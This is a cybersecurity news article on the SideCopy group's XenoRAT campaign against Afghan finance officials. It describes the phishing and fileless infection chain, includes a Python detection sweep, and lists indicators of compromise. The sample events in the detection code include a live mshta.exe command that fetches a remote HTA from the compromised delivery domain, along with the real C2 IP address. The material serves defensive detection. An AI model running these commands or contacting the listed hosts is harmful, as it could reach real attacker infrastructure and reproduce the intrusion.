SideCopy Hackers Deploy Persistent XenoRAT Malware to Target Afghanistan Finance Ministry

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer


A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT.

The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats — regional revenue and finance directorates that form the fiscal backbone of the country.

The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto — the dominant language used by Afghan government workers.

The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, showing that the attackers had precise knowledge of their targets’ working environment.

Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence.

SideCopy operates under the umbrella of the broader Transparent Tribe group, also known as APT36, which has a documented history of targeting South Asian government institutions.

Seqrite Labs has been tracking this threat cluster for years as part of its global spear phishing monitoring program.

Once the victim opened the shortcut file, the malware silently used mshta.exe — a legitimate Windows utility — to reach out to a compromised Afghan education domain and pull a remote payload.

This technique is called Living-off-the-Land, where attackers abuse built-in system tools to avoid triggering security alerts. The malware then decoded obfuscated JavaScript in memory and embedded itself in the Windows Registry, disguising its persistence entry as a Microsoft Edge process.

Infection Chain (Source – Seqrite)

The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a bulletproof server in Frankfurt, Germany.

This command-and-control infrastructure was entirely separate from the delivery domain — a deliberate design to ensure long-term access even if the delivery layer was discovered and shut down.

SideCopy Hackers Deploy Persistent XenoRAT Malware

The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website.

That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.

A legitimate Microsoft binary (Source – Seqrite)

That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.

The shellcode that followed used reflective loading — allocating executable memory and injecting itself without writing the main payload to disk. This fileless approach makes the malware far harder to catch with conventional antivirus scanning.

XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.

The malware creates a mutex called “clouda” to prevent duplicate instances, and it queries installed antivirus products before reporting back to its operators.

Persistence Mechanisms and Infrastructure Exposure

The decoy document dropped during execution was a real Afghan Ministry of Finance internal staff directory, listing Finance Directors, Revenue Chiefs, and Secretaries from all 34 provinces — complete with mobile numbers.

This level of detail indicates the attackers conducted prior intelligence gathering, likely through earlier compromises of Afghan government networks.

The delivery domain abimj.edu.af resolved to IPs 103.132.98.224 and 103.132.98.226, both on a subnet belonging to Afghanistan’s own Ministry of Communication.

Shellcode Execution (Source – Seqrite)

Staging malicious payloads on local Afghan infrastructure allowed traffic to blend with legitimate government communications, bypassing network monitoring tools.

The RAT’s C2 server at 185.235.137.106 was hosted on AS59711, a Bulgaria-registered provider with a Frankfurt data-center presence that has previously been linked to SideCopy activity.

Security teams should monitor for unusual mshta.exe executions, unexpected Registry Run keys mimicking Windows processes, and outbound traffic to unrecognized European hosting providers.

Enforcing application allow-listing, auditing scheduled tasks regularly, and restricting HTA execution from public directories are effective mitigations. Seqrite released detections under signatures including Link.Downloader.50744.GC and Script.Netloader.50745.GC to help identify compromised systems.
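The following Python sweep is an added example, not Seqrite's or the article's code. It turns the monitoring guidance above (unusual mshta.exe launches, Run keys masquerading as Windows processes, the XenoUpdateManager scheduled task, connections to the reported C2) into rules and runs them over constructed Sysmon-style event records; the event schema and field names (`image`, `cmdline`, `target`, `task_name`, `dest_ip`) are assumptions, and the indicators are taken from the IoC table below and kept defanged at rest.

```python
"""Detection sweep for the Operation XENOFISCAL tradecraft described above.

Added example (not Seqrite's or the article's code). Event records are
constructed, Sysmon-style dicts; field names such as "image", "cmdline",
"target" and "task_name" are assumptions about the log schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators copied from the IoC table, kept defanged at rest.
DEFANGED_IOCS = {
    "c2_ip": "185.235.137[.]106",
    "delivery_domain": "abimj[.]edu[.]af",
}


def refang(ioc: str) -> str:
    """Re-fang an indicator for in-memory matching only (never for output)."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {refang(DEFANGED_IOCS["c2_ip"])}
IOC_DOMAINS = {refang(DEFANGED_IOCS["delivery_domain"])}

REMOTE_URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# Crude look-alike check: the campaign's value name "Edgre" contains "edg",
# but its data never points at the real msedge.exe binary.
EDGE_LOOKALIKE_RE = re.compile(r"edg", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(bat|hta|vbs|js|cmd)\b", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    detail: str


def check_event(ev: Dict[str, str]) -> List[Alert]:
    """Return the alerts a single event triggers (empty list if benign)."""
    alerts: List[Alert] = []
    kind = ev.get("type")
    if kind == "process_create":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        if image.endswith("\\mshta.exe"):
            # mshta.exe fetching an HTA over HTTP(S) is the living-off-the-land step.
            if REMOTE_URL_RE.search(cmd):
                alerts.append(Alert("mshta_remote_hta", cmd))
            if any(d in cmd.lower() for d in IOC_DOMAINS):
                alerts.append(Alert("ioc_delivery_domain", cmd))
    elif kind == "registry_set":
        target, data = ev.get("target", ""), ev.get("data", "")
        if RUN_KEY_RE.search(target):
            name = target.rsplit("\\", 1)[-1]
            if EDGE_LOOKALIKE_RE.search(name) and "msedge.exe" not in data.lower():
                alerts.append(Alert("run_key_edge_masquerade", f"{name} -> {data}"))
            if SCRIPT_EXT_RE.search(data):
                alerts.append(Alert("run_key_script_persistence", f"{name} -> {data}"))
    elif kind == "task_create":
        if ev.get("task_name", "").lower() == "xenoupdatemanager":
            alerts.append(Alert("task_xenoupdatemanager", ev["task_name"]))
    elif kind == "network_connect":
        if ev.get("dest_ip") in IOC_IPS:
            alerts.append(Alert("c2_ip_match", ev["dest_ip"]))
    return alerts


def sweep(events: List[Dict[str, str]]) -> List[Alert]:
    """Run every event through check_event and flatten the results."""
    return [a for ev in events for a in check_event(ev)]


# Constructed sample telemetry: four malicious events mirroring the reported
# chain, followed by two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://abimj.edu.af/index.php"},
    {"type": "registry_set",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
     "data": r"C:\Users\Public\noway.bat"},
    {"type": "task_create", "task_name": "XenoUpdateManager"},
    {"type": "network_connect", "dest_ip": "185.235.137.106"},
    # Benign: mshta opening a local help file, no remote URL.
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
    # Benign: a genuine Edge autostart entry pointing at msedge.exe.
    {"type": "registry_set",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch",
     "data": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
]

if __name__ == "__main__":
    for alert in sweep(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

The two benign records show why the rules key on behaviour rather than names alone: a real Edge autostart entry contains "edg" in its value name but points at msedge.exe, and mshta.exe opening a local file carries no remote URL, so neither fires. Indicators stay defanged in the source and are re-fanged only inside the process, consistent with the handling note below the IoC table.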

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
| --- | --- | --- |
| SHA256 | 194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14 | ZIP archive (initial delivery) |
| SHA256 | 3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01 | Malicious LNK file |
| SHA256 | DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB | Decoy PDF document |
| SHA256 | A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67 | ugayt.hta payload |
| SHA256 | 5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45 | noway.bat (persistence batch file) |
| SHA256 | 99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D | zuidrt.hta (Stage-2 HTA payload) |
| SHA256 | 8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A | WayBroad.dll (Stage-1 loader DLL) |
| SHA256 | 0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772 | Aotestpass.dll (Stage-2 loader DLL) |
| SHA256 | 9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14 | XenoRAT final payload |
| IP Address | 185.235.137[.]106 | XenoRAT C2 server (HZ Hosting, Frankfurt) |
| IP Address | 103.132.98[.]224 | Delivery domain resolved IP (Afghan MoCIT) |
| IP Address | 103.132.98[.]226 | Delivery domain resolved IP (Afghan MoCIT) |
| Domain | abimj[.]edu[.]af | Compromised Afghan education domain used for payload delivery |
| URL | hxxp://abimj[.]edu[.]af/index.php | Stage-1 remote HTA/PHP payload endpoint |
| URL | hxxp://abimj[.]edu[.]af/institute/cloudiyaf/document.pdf | Decoy PDF download URL |
| URL | hxxps://abimj[.]edu[.]af/institute/10/ | Stage-2 payload download URL |
| URL | hxxps://abimj[.]edu[.]af/institute/7/ | Alternate Stage-2 URL (Windows 7 targets) |
| File Name | zuidrt.hta | Persistent HTA payload stored in Public folder |
| File Name | noway.bat | Hidden batch file for registry persistence execution |
| File Name | ayui.vmxx | Disguised encoded Stage-2 payload blob |
| File Name | ayhui.vmxx | Reconstructed intermediate shellcode container |
| Registry Key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run “Edgre” | Persistence Run key masquerading as Microsoft Edge |
| Mutex | clouda | XenoRAT single-instance mutex |
| Scheduled Task | XenoUpdateManager | Persistence scheduled task created by XenoRAT |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
